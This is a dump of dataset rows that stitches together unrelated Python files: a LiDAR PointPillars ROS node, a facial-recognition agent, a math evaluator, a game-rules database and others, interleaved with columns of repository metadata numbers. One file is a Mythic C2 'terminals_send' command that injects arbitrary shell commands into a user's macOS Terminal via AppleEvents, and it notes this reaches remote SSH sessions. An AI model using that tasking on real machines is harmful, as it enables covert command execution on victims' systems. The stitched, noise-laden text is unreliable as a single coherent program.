        new_points.append(point)
    return np.array(new_points)
def callback(msg):
arr_bbox = BoundingBoxArray()
# pcl_msg = pc2.read_points(msg, skip_nans=False, field_names=("x", "y", "z", "intensity", "ring"))
pcl_msg = pc2.read_points(msg, skip_nans=False, field_names=("x", "y", "z"))
# pcl_msg = pc2.read_points(msg, skip_nans=True)
# print(pcl_msg)
np_p = np.array(list(pcl_msg), dtype=np.float32)
np_p = np.column_stack((np_p, np.zeros((np_p.shape[0], 1))))
print(np_p)
# np_p = np.delete(np_p, -1, 1) # delete "ring" field
# np_p = delete_nan_points(np_p)
eval_dataset = input_reader_builder.build(
input_cfg,
model_cfg,
training=False,
voxel_generator=voxel_generator,
target_assigner=target_assigner,
inference=True,
points=np_p)
eval_dataloader = torch.utils.data.DataLoader(
eval_dataset,
batch_size=input_cfg.batch_size,
shuffle=False,
num_workers=input_cfg.num_workers,
pin_memory=False,
collate_fn=merge_second_batch)
net.eval()
global_set = None
eval_data = iter(eval_dataloader)
example = next(eval_data)
example = example_convert_to_torch(example, torch.float32)
example_tuple = list(example.values())
example_tuple[5] = torch.from_numpy(example_tuple[5])
result = predict_kitti_to_anno(net, example_tuple, class_names, center_limit_range, model_cfg.lidar_input, global_set)
print("result", result)
# def evaluate(config_path,
# model_dir,
# result_path=None,
# predict_test=False,
# ckpt_path=None,
# ref_detfile=None,
# pickle_result=True,
# read_predict_pkl_path=None):
#
# model_dir = str(Path(model_dir).resolve())
# if predict_test:
# result_name = 'predict_test'
# else:
# result_name = 'eval_results'
# if result_path is None:
# model_dir = Path(model_dir)
# result_path = model_dir / result_name
# else:
# result_path = pathlib.Path(result_path)
#
# if isinstance(config_path, str):
# config = pipeline_pb2.TrainEvalPipelineConfig()
# with open(config_path, "r") as f:
# proto_str = f.read()
# text_format.Merge(proto_str, config)
# else:
# config = config_path
#
# input_cfg = config.eval_input_reader
# model_cfg = config.model.second
# train_cfg = config.train_config
# class_names = list(input_cfg.class_names)
# center_limit_range = model_cfg.post_center_limit_range
# #########################
# # Build Voxel Generator
# #########################
# voxel_generator = voxel_builder.build(model_cfg.voxel_generator)
# bv_range = voxel_generator.point_cloud_range[[0, 1, 3, 4]]
# box_coder = box_coder_builder.build(model_cfg.box_coder)
# target_assigner_cfg = model_cfg.target_assigner
# target_assigner = target_assigner_builder.build(target_assigner_cfg,
# bv_range, box_coder)
#
# net = second_builder.build(model_cfg, voxel_generator, target_assigner, input_cfg.batch_size)
# net.cuda()
# if train_cfg.enable_mixed_precision:
# net.half()
# net.metrics_to_float()
# net.convert_norm_to_float(net)
#
# if ckpt_path is None:
# torchplus.train.try_restore_latest_checkpoints(model_dir, [net])
# else:
# torchplus.train.restore(ckpt_path, net)
#
# eval_dataset = input_reader_builder.build(
# input_cfg,
# model_cfg,
# training=False,
# voxel_generator=voxel_generator,
# target_assigner=target_assigner)
#
# eval_dataloader = torch.utils.data.DataLoader(
# eval_dataset,
# batch_size=input_cfg.batch_size,
# shuffle=False,
# num_workers=input_cfg.num_workers,
# pin_memory=False,
# collate_fn=merge_second_batch)
#
# if train_cfg.enable_mixed_precision:
# float_dtype = torch.float16
# else:
# float_dtype = torch.float32
#
# net.eval()
# result_path_step = result_path / f"step_{net.get_global_step()}"
# result_path_step.mkdir(parents=True, exist_ok=True)
# t = time.time()
# dt_annos = []
# global_set = None
# eval_data = iter(eval_dataloader)
# example = next(eval_data)
# example = example_convert_to_torch(example, float_dtype)
# example_tuple = list(example.values())
# example_tuple[5] = torch.from_numpy(example_tuple[5])
# if (example_tuple[3].size()[0] != input_cfg.batch_size):
# continue
#
# dt_annos += predict_kitti_to_anno(
# net, example_tuple, class_names, center_limit_range,
# model_cfg.lidar_input, global_set)
# for example in iter(eval_dataloader):
# # eval example [0: 'voxels', 1: 'num_points', 2: 'coordinates', 3: 'rect'
# # 4: 'Trv2c', 5: 'P2', 6: 'anchors', 7: 'anchors_mask'
# # 8: 'image_idx', 9: 'image_shape']
#
# # eval example [0: 'voxels', 1: 'num_points', 2: 'coordinate', 3: 'anchors',
# # 4: 'anchor_mask', 5: 'pc_idx']
# example = example_convert_to_torch(example, float_dtype)
# # eval example [0: 'voxels', 1: 'num_points', 2: 'coordinate', 3: 'anchors',
# # 4: 'anchor_mask', 5: 'pc_idx']
#
# example_tuple = list(example.values())
# example_tuple[5] = torch.from_numpy(example_tuple[5])
# # example_tuple[9] = torch.from_numpy(example_tuple[9])
#
# if (example_tuple[3].size()[0] != input_cfg.batch_size):
# continue
#
# dt_annos += predict_kitti_to_anno(
# net, example_tuple, class_names, center_limit_range,
# model_cfg.lidar_input, global_set)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='testing')
args = parser.parse_args()
model_dir = "/nfs/nas/model/songhongli/neolix_shanghai_3828/"
config_path = "/home/songhongli/Projects/pointpillars2/second/configs/pointpillars/xyres_16_4cls.proto"
if isinstance(config_path, str):
config = pipeline_pb2.TrainEvalPipelineConfig()
with open(config_path, "r") as f:
proto_str = f.read()
text_format.Merge(proto_str, config)
else:
config = config_path
input_cfg = config.eval_input_reader
model_cfg = config.model.second
train_cfg = config.train_config
class_names = list(input_cfg.class_names)
center_limit_range = model_cfg.post_center_limit_range
#########################
# Build Voxel Generator
#########################
voxel_generator = voxel_builder.build(model_cfg.voxel_generator)
bv_range = voxel_generator.point_cloud_range[[0, 1, 3, 4]]
box_coder = box_coder_builder.build(model_cfg.box_coder)
target_assigner_cfg = model_cfg.target_assigner
target_assigner = target_assigner_builder.build(target_assigner_cfg,
bv_range, box_coder)
net = second_builder.build(model_cfg, voxel_generator, target_assigner, input_cfg.batch_size)
net.cuda()
torchplus.train.try_restore_latest_checkpoints(model_dir, [net])
# code added for using ROS
rospy.init_node('pointpillars_ros_node')
sub_ = rospy.Subscriber("/sensor/velodyne16/all/compensator/PointCloud2", PointCloud2, callback, queue_size=1)
pub_points = rospy.Publisher("points_modified", PointCloud2, queue_size=1)
pub_arr_bbox = rospy.Publisher("pre_arr_bbox", BoundingBoxArray, queue_size=10)
# pub_bbox = rospy.Publisher("voxelnet_bbox", BoundingBox, queue_size=1)
print("[+] voxelnet_ros_node has started!")
rospy.spin()
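# To exercise this node (topic name taken from the subscriber above), launch it
# inside a ROS environment and publish PointCloud2 messages on
# /sensor/velodyne16/all/compensator/PointCloud2; the callback then runs
# inference and prints the predicted annotations.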
| 37.432927
| 176
| 0.617147
| 2,496
| 18,417
| 4.269631
| 0.157452
| 0.014263
| 0.00366
| 0.004129
| 0.442714
| 0.403866
| 0.373839
| 0.363705
| 0.346439
| 0.329736
| 0
| 0.031112
| 0.25129
| 18,417
| 491
| 177
| 37.509165
| 0.741751
| 0.317967
| 0
| 0.059925
| 0
| 0
| 0.040741
| 0.016411
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037453
| false
| 0.003745
| 0.104869
| 0
| 0.168539
| 0.022472
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e5c7dba2e2083dcb5bc4c5689df3f572c63510f
| 3,112
|
py
|
Python
|
agent.py
|
AdamMiltonBarker/TassAI
|
61ae4f208f06ea39cc5b58079175f17bf1fca4c4
|
[
"MIT"
] | 1
|
2021-06-29T09:46:47.000Z
|
2021-06-29T09:46:47.000Z
|
agent.py
|
AdamMiltonBarker/TassAI
|
61ae4f208f06ea39cc5b58079175f17bf1fca4c4
|
[
"MIT"
] | 4
|
2021-06-27T16:06:43.000Z
|
2021-06-27T16:09:53.000Z
|
agent.py
|
AdamMiltonBarker/TassAI
|
61ae4f208f06ea39cc5b58079175f17bf1fca4c4
|
[
"MIT"
] | 2
|
2020-09-28T02:11:43.000Z
|
2020-10-13T15:27:41.000Z
|
#!/usr/bin/env python3
""" HIAS TassAI Facial Recognition Agent.
HIAS TassAI Facial Recognition Agent processes streams from local
or remote cameras to identify known and unknown humans.
MIT License
Copyright (c) 2021 Asociación de Investigacion en Inteligencia Artificial
Para la Leucemia Peter Moss
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files(the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Contributors:
- Adam Milton-Barker
"""
import sys
from abc import ABC, abstractmethod
from modules.AbstractAgent import AbstractAgent
from modules.helpers import helpers
from modules.model import model
from modules.read import read
from modules.stream import stream
from modules.sockets import sockets
from threading import Thread
class agent(AbstractAgent):
""" HIAS TassAI Facial Recognition Agent
HIAS TassAI Facial Recognition Agent processes
streams from local or remote cameras to identify
known and unknown humans.
"""
def set_model(self, mtype):
# Initializes the TassAI model
self.model = model(self.helpers)
def load_model(self):
""" Loads the trained model """
# Prepares the network and data
self.model.prepare_network()
self.model.prepare_data()
def server(self):
""" Loads the API server """
# Starts the MQTT connection
self.mqtt_start()
# Initializes the socket
self.sockets = sockets(self.helpers)
# Loads the TassAI model
self.load_model()
# Camera read and stream threads
Thread(target=read.run, args=(self, ),
daemon=True).start()
Thread(target=stream.run, args=(self, ),
daemon=True).start()
def signal_handler(self, signal, frame):
self.helpers.logger.info("Disconnecting")
self.mqtt.disconnect()
sys.exit(1)
agent = agent()
def main():
if len(sys.argv) < 2:
agent.helpers.logger.info(
"You must provide an argument")
exit()
elif sys.argv[1] not in agent.helpers.confs["agent"]["params"]:
agent.helpers.logger.info(
"Mode not supported! server, train or inference")
exit()
mode = sys.argv[1]
if mode == "classify":
agent.set_model("")
agent.inference()
elif mode == "server":
agent.set_model("")
agent.server()
if __name__ == "__main__":
main()
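As a usage note: the agent dispatches on its first command-line argument, so a typical launch (assuming the mode is listed in confs["agent"]["params"]) looks like this.
# Hypothetical launch commands (shell):
#   python3 agent.py server    # start MQTT, sockets and camera threads
#   python3 agent.py classify  # run one-off inference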
| 26.151261
| 78
| 0.754499
| 447
| 3,112
| 5.214765
| 0.434004
| 0.037752
| 0.027456
| 0.046332
| 0.138138
| 0.138138
| 0.11583
| 0.11583
| 0.11583
| 0.11583
| 0
| 0.003466
| 0.165488
| 3,112
| 118
| 79
| 26.372881
| 0.894109
| 0.556877
| 0
| 0.173913
| 0
| 0
| 0.089552
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108696
| false
| 0
| 0.195652
| 0
| 0.326087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e604e0888e3f4c9cd3d2b535fdc4b7f1eabfe77
| 2,576
|
py
|
Python
|
Payload_Types/apfell/mythic/agent_functions/terminals_send.py
|
xorrior/Mythic
|
ea348b66e1d96e88e0e7fbabff182945cbdf12b6
|
[
"BSD-3-Clause"
] | 2
|
2021-01-28T19:35:46.000Z
|
2021-04-08T12:01:48.000Z
|
Payload_Types/apfell/mythic/agent_functions/terminals_send.py
|
xorrior/Mythic
|
ea348b66e1d96e88e0e7fbabff182945cbdf12b6
|
[
"BSD-3-Clause"
] | null | null | null |
Payload_Types/apfell/mythic/agent_functions/terminals_send.py
|
xorrior/Mythic
|
ea348b66e1d96e88e0e7fbabff182945cbdf12b6
|
[
"BSD-3-Clause"
] | 2
|
2020-12-29T02:34:13.000Z
|
2021-06-24T04:07:38.000Z
|
from CommandBase import *
import json
from MythicResponseRPC import *
class TerminalsSendArguments(TaskArguments):
def __init__(self, command_line):
super().__init__(command_line)
self.args = {
"window": CommandParameter(
name="window",
type=ParameterType.Number,
description="window # to send command to",
),
"tab": CommandParameter(
name="tab",
type=ParameterType.Number,
description="tab # to send command to",
),
"command": CommandParameter(
name="command",
type=ParameterType.String,
description="command to execute",
),
}
async def parse_arguments(self):
if len(self.command_line) > 0:
if self.command_line[0] == "{":
self.load_args_from_json_string(self.command_line)
else:
raise ValueError("Missing JSON arguments")
else:
raise ValueError("Missing arguments")
class TerminalsSendCommand(CommandBase):
cmd = "terminals_send"
needs_admin = False
help_cmd = "terminals_send"
description = """
This uses AppleEvents to inject the shell command, {command}, into the specified terminal shell as if the user typed it from the keyboard. This is pretty powerful. Consider the instance where the user is SSH-ed into another machine via terminal - with this you can inject commands to run on the remote host. Just remember, the user will be able to see the command, but you can always see what they see as well with the "terminals_read contents" command.
"""
version = 1
is_exit = False
is_file_browse = False
is_process_list = False
is_download_file = False
is_remove_file = False
is_upload_file = False
author = "@its_a_feature_"
attackmapping = ["T1059", "T1184"]
argument_class = TerminalsSendArguments
async def create_tasking(self, task: MythicTask) -> MythicTask:
resp = await MythicResponseRPC(task).register_artifact(
artifact_instance="{}".format(
task.args.get_arg("command"),
),
artifact_type="Process Create",
)
resp = await MythicResponseRPC(task).register_artifact(
artifact_instance="Target Application of Terminal",
artifact_type="AppleEvent Sent",
)
return task
async def process_response(self, response: AgentResponse):
pass
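Since parse_arguments only accepts a JSON object, a hypothetical tasking payload matching the three declared parameters could look like this (assuming the TaskArguments base class stores the raw command line).
import json
args = TerminalsSendArguments(json.dumps({
    "window": 1,          # window # to send the command to
    "tab": 1,             # tab # within that window
    "command": "whoami",  # command injected via AppleEvents
}))
# await args.parse_arguments()  # populates args from the JSON string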
| 36.8
| 457
| 0.622671
| 276
| 2,576
| 5.641304
| 0.467391
| 0.035324
| 0.038536
| 0.043674
| 0.07964
| 0.07964
| 0.07964
| 0.07964
| 0
| 0
| 0
| 0.006081
| 0.297748
| 2,576
| 69
| 458
| 37.333333
| 0.854616
| 0
| 0
| 0.16129
| 0
| 0.016129
| 0.281444
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016129
| false
| 0.016129
| 0.048387
| 0
| 0.33871
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e6142fd70771c11fbb624c19a0644bc6c708693
| 623
|
py
|
Python
|
mephisto/plugins/math_expr.py
|
Kenton1989/mephisto-bot
|
50a8008c99b984a453713f480fa578bf5a8353c8
|
[
"MIT"
] | null | null | null |
mephisto/plugins/math_expr.py
|
Kenton1989/mephisto-bot
|
50a8008c99b984a453713f480fa578bf5a8353c8
|
[
"MIT"
] | null | null | null |
mephisto/plugins/math_expr.py
|
Kenton1989/mephisto-bot
|
50a8008c99b984a453713f480fa578bf5a8353c8
|
[
"MIT"
] | null | null | null |
import re
import math
import numexpr as ne
MATH_CONST = {
'pi': math.pi,
'π': math.pi,
'e': math.e,
'inf': math.inf,
'i': 1j,
'j': 1j,
}
SUB_MAP = {
# replace UTF char with ASCII char
'(': '(',
')': ')',
',': ',',
'-': '-',
'÷': '/',
'×': '*',
'+': '+',
# replace common synonym
'ln': 'log',
'lg': 'log10',
'∞': 'inf',
'mod': '%',
}
SUB_RE = re.compile('|'.join(re.escape(s) for s in SUB_MAP.keys()))
def evaluate(txt: str):
txt = SUB_RE.sub(lambda m: SUB_MAP[m.group(0)], txt)
return ne.evaluate(txt, local_dict=MATH_CONST).item()
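A few illustrative calls (results assume numexpr's standard operators and math functions):
print(evaluate('1 + 2×3'))  # '×' is normalized to '*'   -> 7
print(evaluate('7 mod 3'))  # 'mod' is normalized to '%' -> 1
print(evaluate('ln(e)'))    # 'ln' -> 'log' (natural log), e from MATH_CONST -> ~1.0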
| 16.394737
| 67
| 0.473515
| 85
| 623
| 3.411765
| 0.588235
| 0.062069
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011062
| 0.274478
| 623
| 37
| 68
| 16.837838
| 0.623894
| 0.088283
| 0
| 0
| 0
| 0
| 0.077876
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.107143
| 0
| 0.178571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e61d7b3b7f328b277a5ef816c4995021aeb1703
| 1,185
|
py
|
Python
|
testemu/client/testemu_client/network.py
|
advaoptical/netemu
|
a418503d3829f206602e9360c05235626fa8bec5
|
[
"Apache-2.0"
] | null | null | null |
testemu/client/testemu_client/network.py
|
advaoptical/netemu
|
a418503d3829f206602e9360c05235626fa8bec5
|
[
"Apache-2.0"
] | null | null | null |
testemu/client/testemu_client/network.py
|
advaoptical/netemu
|
a418503d3829f206602e9360c05235626fa8bec5
|
[
"Apache-2.0"
] | null | null | null |
from collections.abc import Mapping  # Mapping moved out of collections in Python 3.10
from . import yang_models
class Meta(type):
class Interface(
yang_models
.com_adva_netemu_testemu_client_TestInterface_YangListModel):
"""
Pythonizer for Java class ``TestInterface``.
From Java package ``com.adva.netemu.testemu.client``
"""
class TestNetwork(
yang_models.com_adva_netemu_testemu_client_TestNetwork_YangModel,
metaclass=Meta):
"""
Pythonizer for Java class ``TestNetwork``.
From Java package ``com.adva.netemu.testemu.client``
"""
@property
def interfaces(self):
class List(Mapping):
@staticmethod
def __len__():
return len(self._java_object.getInterfaces())
@staticmethod
def __iter__():
for intf in self._java_object.getInterfaces():
yield type(self).Interface(intf)
@staticmethod
def __getitem__(name):
for intf in List.__iter__():
if intf.name() == name:
return intf
raise KeyError(name)
return List()
| 23.7
| 73
| 0.571308
| 112
| 1,185
| 5.732143
| 0.383929
| 0.043614
| 0.080997
| 0.124611
| 0.239875
| 0.239875
| 0.239875
| 0.127726
| 0
| 0
| 0
| 0
| 0.34346
| 1,185
| 49
| 74
| 24.183673
| 0.825193
| 0.164557
| 0
| 0.115385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0.076923
| 0.038462
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e61d7b801c1c3cd496fc2afd8c46c182f86ceda
| 666
|
py
|
Python
|
asym_rlpo/representations/identity.py
|
abaisero/asym-porl
|
8a76d920e51d783bbeeeea3cd2b02efffbb33c72
|
[
"MIT"
] | 2
|
2021-08-24T22:41:36.000Z
|
2021-10-31T01:55:37.000Z
|
asym_rlpo/representations/identity.py
|
abaisero/asym-porl
|
8a76d920e51d783bbeeeea3cd2b02efffbb33c72
|
[
"MIT"
] | null | null | null |
asym_rlpo/representations/identity.py
|
abaisero/asym-porl
|
8a76d920e51d783bbeeeea3cd2b02efffbb33c72
|
[
"MIT"
] | 1
|
2021-10-13T12:27:40.000Z
|
2021-10-13T12:27:40.000Z
|
import gym
import torch
from asym_rlpo.utils.debugging import checkraise
from .base import Representation
class IdentityRepresentation(Representation):
def __init__(self, input_space: gym.spaces.Box):
super().__init__()
checkraise(
isinstance(input_space, gym.spaces.Box)
and len(input_space.shape) == 1,
TypeError,
'input_space must be Box',
)
(self.__out_dim,) = input_space.shape
@property
def dim(self):
return self.__out_dim
def forward( # pylint: disable=no-self-use
self, inputs: torch.Tensor
) -> torch.Tensor:
return inputs
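A minimal usage sketch, assuming Representation is a torch nn.Module (so the instance is callable):
import gym
import numpy as np
import torch
space = gym.spaces.Box(low=-1.0, high=1.0, shape=(4,), dtype=np.float32)
identity = IdentityRepresentation(space)
x = torch.zeros(4)
assert identity.dim == 4
assert torch.equal(identity(x), x)  # forward() passes inputs through unchanged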
| 22.2
| 52
| 0.630631
| 76
| 666
| 5.263158
| 0.526316
| 0.125
| 0.065
| 0.095
| 0.11
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002083
| 0.279279
| 666
| 29
| 53
| 22.965517
| 0.83125
| 0.040541
| 0
| 0
| 0
| 0
| 0.036107
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.190476
| 0.095238
| 0.47619
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e630265553913112faaae0a442558c6d77373c7
| 8,885
|
py
|
Python
|
src/ggplib/db/lookup.py
|
richemslie/ggplib
|
8388678f311db4a9906d8a3aff71d3f0037b623b
|
[
"MIT"
] | 11
|
2019-03-02T13:49:07.000Z
|
2021-12-21T17:03:05.000Z
|
src/ggplib/db/lookup.py
|
ggplib/ggplib
|
8388678f311db4a9906d8a3aff71d3f0037b623b
|
[
"MIT"
] | 2
|
2019-05-15T18:23:50.000Z
|
2019-05-19T08:13:19.000Z
|
src/ggplib/db/lookup.py
|
ggplib/ggplib
|
8388678f311db4a9906d8a3aff71d3f0037b623b
|
[
"MIT"
] | 1
|
2020-04-02T17:35:35.000Z
|
2020-04-02T17:35:35.000Z
|
import sys
import traceback
from ggplib.util import log
from ggplib.statemachine import builder
from ggplib.db import signature
class GameInfo(object):
def __init__(self, game, gdl_str):
self.game = game
self.gdl_str = gdl_str
# might be None, depends on whether we grab it from sig.json
self.idx = None
# lazy loads in get_symbol_map()
self.sigs = None
self.symbol_map = None
# lazy loads
self.sm = None
self.model = None
def get_symbol_map(self):
if self.sigs is None:
idx, self.sigs = signature.get_index(self.gdl_str, verbose=False)
if self.idx is not None:
assert self.idx == idx
else:
self.idx = idx
self.symbol_map = signature.build_symbol_map(self.sigs, verbose=False)
def lazy_load(self, the_game_store):
if self.sm is None:
# ok here we can cache the game XXX
self.model, self.sm = builder.build_sm(self.gdl_str,
the_game_store=the_game_store,
add_to_game_store=True)
log.verbose("Lazy loading done for %s" % self.game)
def get_sm(self):
return self.sm.dupe()
class TempGameInfo(object):
def __init__(self, game, gdl_str, sm, model):
self.game = game
self.gdl_str = gdl_str
self.sm = sm
self.model = model
def get_sm(self):
return self.sm.dupe()
class GameInfoBypass(GameInfo):
''' bypass everything, special case statemachine that doesn't have any GDL '''
special_game = True
def __init__(self, game, sm, model):
self.game = game
self.sm = sm
self.model = model
def get_symbol_map(self):
pass
def lazy_load(self, the_game_store):
pass
def get_sm(self):
return self.sm.dupe()
###############################################################################
class LookupFailed(Exception):
pass
class GameDatabase:
def __init__(self, root_store):
self.root_store = root_store
self.rulesheets_store = root_store.get_directory("rulesheets")
self.games_store = root_store.get_directory("games", create=True)
self.idx_mapping = {}
self.game_mapping = {}
@property
def all_games(self):
return self.game_mapping.keys()
def load(self, verbose=True):
if verbose:
log.info("Building the database")
filenames = self.rulesheets_store.listdir("*.kif")
for fn in sorted(filenames):
# skip tmp files
if fn.startswith("tmp"):
continue
game = fn.replace(".kif", "")
# get the gdl
gdl_str = self.rulesheets_store.load_contents(fn)
info = GameInfo(game, gdl_str)
# first does the game directory exist?
the_game_store = self.games_store.get_directory(game, create=True)
if the_game_store.file_exists("sig.json"):
info.idx = the_game_store.load_json("sig.json")['idx']
else:
if verbose:
log.verbose("Creating signature for %s" % game)
info.get_symbol_map()
if info.symbol_map is None:
log.warning("FAILED to add: %s" % game)
raise Exception("FAILED TO add %s" % game)
# save as json
assert info.idx is not None
the_game_store.save_json("sig.json", dict(idx=info.idx))
assert info.idx is not None
if info.idx in self.idx_mapping:
other_info = self.idx_mapping[info.idx]
log.warning("DUPE GAMES: %s %s!=%s" % (info.idx, game, other_info.game))
raise Exception("Dupes not allowed in database")
self.idx_mapping[info.idx] = info
self.game_mapping[info.game] = info
def get_by_name(self, name):
if name not in self.game_mapping:
raise LookupFailed("Did not find game: %s" % name)
info = self.game_mapping[name]
if getattr(info, "special_game", False):
return info
# for side effects
info.get_symbol_map()
the_game_store = self.games_store.get_directory(name)
info.lazy_load(the_game_store)
return info
def lookup(self, gdl_str):
idx, sig = signature.get_index(gdl_str, verbose=False)
if idx not in self.idx_mapping:
raise LookupFailed("Did not find game : %s" % idx)
info = self.idx_mapping[idx]
info.get_symbol_map()
# create the symbol map for this gdl_str
symbol_map = signature.build_symbol_map(sig, verbose=False)
new_mapping = {}
# remap the roles back
roles = info.sigs.roles.items()
for ii in range(len(roles)):
match = "role%d" % ii
for k1, v1 in roles:
if v1 == match:
for k2, v2 in sig.roles.items():
if v2 == match:
new_mapping[k2] = k1
break
# remap the other symbols
for k1, v1 in info.symbol_map.items():
new_mapping[symbol_map[k1]] = v1
# remove if the keys/values all the same in new_mapping
all_same = True
for k, v in new_mapping.items():
if k != v:
all_same = False
break
if all_same:
new_mapping = None
# log.info("Lookup - found game %s in database" % info.game)
the_game_store = self.games_store.get_directory(info.game)
info.lazy_load(the_game_store)
return info, new_mapping
###############################################################################
def install_draughts(add_game):
' load custom c++ statemachine for draughts '
from ggplib import interface
from ggplib.non_gdl_games.draughts import desc, model
desc10 = desc.BoardDesc(10)
cpp_statemachines = interface.CppStateMachines()
model = model.create_sm_model(desc10)
for game_variant in ["draughts_10x10",
"draughts_killer_10x10",
"draughts_bt_10x10"]:
sm_create_meth = getattr(cpp_statemachines, game_variant)
add_game(game_variant, sm_create_meth(), model)
def install_hex(add_game):
' load custom c++ statemachine for hex '
from ggplib import interface
from ggplib.non_gdl_games.hex.model import create_sm_model
cpp_statemachines = interface.CppStateMachines()
for sz in [9, 11, 13, 15, 19]:
cpp_sm = cpp_statemachines.get_hex(sz)
model = create_sm_model(sz)
add_game("hex_lg_%s" % sz, cpp_sm, model)
###############################################################################
# The API:
the_database = None
def get_database(verbose=True):
global the_database
def add_game_to_db(game, sm, model):
info = GameInfoBypass(game, sm, model)
the_database.game_mapping[game] = info
if the_database is None:
from ggplib.db.store import get_root
the_database = GameDatabase(get_root())
the_database.load(verbose=verbose)
try:
install_draughts(add_game_to_db)
except Exception as err:
log.error("Failed to install draughts: %s" % err)
try:
install_hex(add_game_to_db)
except Exception as err:
log.error("Failed to install hex: %s" % err)
return the_database
def get_all_game_names():
return get_database().all_games
# XXX build_sm not used.
def by_name(name, build_sm=True):
try:
db = get_database(verbose=False)
return db.get_by_name(name)
except Exception as exc:
# creates temporary files
msg = "Lookup of %s failed: %s" % (name, exc)
log.error(msg)
log.error(traceback.format_exc())
raise LookupFailed(msg)
def by_gdl(gdl):
try:
gdl_str = gdl
if not isinstance(gdl, str):
lines = []
for s in gdl:
lines.append(str(s))
gdl_str = "\n".join(lines)
db = get_database()
try:
info, mapping = db.lookup(gdl_str)
except LookupFailed as exc:
etype, value, tb = sys.exc_info()
traceback.print_exc()
raise LookupFailed("Did not find game %s" % exc)
return mapping, info
except Exception as exc:
# creates temporary files
log.error("Lookup failed: %s" % exc)
model, sm = builder.build_sm(gdl)
info = TempGameInfo("unknown", gdl, sm, model)
return None, info
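A usage sketch of the module API above; which game names exist depends on the rulesheets installed in the local store.
from ggplib.db import lookup
name = next(iter(lookup.get_all_game_names()))
info = lookup.by_name(name)  # GameInfo, lazily building the statemachine
sm = info.get_sm()           # always a dupe of the cached statemachine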
| 28.206349
| 88
| 0.566798
| 1,113
| 8,885
| 4.330638
| 0.18239
| 0.021162
| 0.029876
| 0.009336
| 0.269917
| 0.228838
| 0.201037
| 0.154979
| 0.079046
| 0.058506
| 0
| 0.006455
| 0.319977
| 8,885
| 314
| 89
| 28.296178
| 0.791294
| 0.074733
| 0
| 0.257426
| 0
| 0
| 0.06699
| 0.00261
| 0
| 0
| 0
| 0
| 0.014851
| 1
| 0.108911
| false
| 0.024752
| 0.049505
| 0.024752
| 0.247525
| 0.004951
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e658277a9b24094cf1e76fa7c348cccc93b01df
| 7,352
|
py
|
Python
|
main.py
|
dogerish/pic2html
|
cca9d032fb2325cb8c220cd0f5f632235d0f8c94
|
[
"MIT"
] | null | null | null |
main.py
|
dogerish/pic2html
|
cca9d032fb2325cb8c220cd0f5f632235d0f8c94
|
[
"MIT"
] | null | null | null |
main.py
|
dogerish/pic2html
|
cca9d032fb2325cb8c220cd0f5f632235d0f8c94
|
[
"MIT"
